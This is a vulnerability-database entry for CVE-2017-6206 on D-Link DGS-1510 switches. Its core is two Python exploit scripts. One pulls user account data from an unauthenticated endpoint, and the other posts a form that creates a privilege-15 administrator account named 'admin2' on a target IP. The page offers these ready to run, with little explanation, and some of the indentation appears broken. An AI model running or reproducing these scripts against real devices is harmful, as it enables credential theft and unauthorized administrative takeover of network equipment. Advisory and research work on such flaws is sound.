Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multiple D-Link Products Unspecified Information Disclosure Vulnerability(CVE-2017-6206)

🗓️ 22 Mar 2017 00:00:00Reported by 名匿Type 
seebug
 seebug🔗 www.seebug.org👁 24 Views

Information Disclosure Vulnerability in D-Link Products, CVE-2017-620

Related
Code
ReporterTitlePublishedViews
Family
0day.today		D-Link DGS-1510 Exploit
21 Mar 201700:00
zdt
Circl		CVE-2017-6206
20 Mar 201700:00
circl
CNVD		Multiple D-Link DGS-1510 Websmart Information Disclosure Vulnerabilities
24 Feb 201700:00
cnvd
CVE		CVE-2017-6206
23 Feb 201706:16
cve
Cvelist		CVE-2017-6206
23 Feb 201706:16
cvelist
NVD		CVE-2017-6206
23 Feb 201706:59
nvd
OSV		CVE-2017-6206
23 Feb 201706:59
osv
Prion		Information disclosure
23 Feb 201706:59
prion

                                                ================
get-user-info.py
================
 
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
 
def make_requests():
    """Calls request functions sequentially."""
    response = [None]
    responseText = None
 
    if(request_ip(response)):
        # Success, possibly use response.
        responseText = read_response(response[0])
                print responseText
        response[0].close()
    else:
        # Failure, cannot use response.
        pass
 
 
def read_response(response):
    """ Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
    if response.info().get('Content-Encoding') == 'gzip':
        buf = StringIO(response.read())
        return gzip.GzipFile(fileobj=buf).read()
 
    elif response.info().get('Content-Encoding') == 'deflate':
        decompress = zlib.decompressobj(-zlib.MAX_WBITS)
        inflated = decompress.decompress(response.read())
        inflated += decompress.flush()
        return inflated
 
    return response.read()
 
 
def request_ip(response):
    """Tries to request the URL. Returns True if the request was successful; false otherwise.
    http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
     
    response -- After the function has finished, will possibly contain the response to the request.
     
    """
    response[0] = None
 
    try:
        # Create request to URL.
                import sys
                ip = sys.argv[1]
                print ip
        req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
 
        # Set request headers.
        req.add_header("Connection", "keep-alive")
        req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
        req.add_header("X-Requested-With", "XMLHttpRequest")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate, sdch")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
        req.add_header("Cookie", "Language=en")
 
        # Get response to request.
        response[0] = urllib2.urlopen(req)
 
    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        return False
 
    return True
 
 
make_requests()
 
===========
user_add.py
===========
 
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
 
def make_requests():
    """Calls request functions sequentially."""
    response = [None]
    responseText = None
 
    if(request_ip(response)):
        # Success, possibly use response.
        responseText = read_response(response[0])
                print "Username dlinktest is successfully Added"
        response[0].close()
    else:
        # Failure, cannot use response.
                print "locha"
        pass
 
 
def read_response(response):
    """ Returns the text contained in the response.  For example, the page HTML.  Only handles the most common HTTP encodings."""
    if response.info().get('Content-Encoding') == 'gzip':
        buf = StringIO(response.read())
        return gzip.GzipFile(fileobj=buf).read()
 
    elif response.info().get('Content-Encoding') == 'deflate':
        decompress = zlib.decompressobj(-zlib.MAX_WBITS)
        inflated = decompress.decompress(response.read())
        inflated += decompress.flush()
        return inflated
 
    return response.read()
 
 
def request_ip(response):
    """Tries to request the URL. Returns True if the request was successful; false otherwise.
    http://ip_address/form/User_Accounts_Apply
     
    response -- After the function has finished, will possibly contain the response to the request.
     
    """
    response[0] = None
 
    try:
        # Create request to URL.
                import sys
                ip = sys.argv[1]
        req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
 
        # Set request headers.
        req.add_header("Connection", "keep-alive")
        req.add_header("Cache-Control", "max-age=0")
        req.add_header("Origin", "http://%s/"% ip)
        req.add_header("Upgrade-Insecure-Requests", "1")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
 
        # Set request body.
        body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
 
        # Get response to request.
        response[0] = urllib2.urlopen(req, body)
 
    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        return False
 
    return True
 
 
make_requests()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Mar 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.46431
d-linkproductsinformation disclosure
24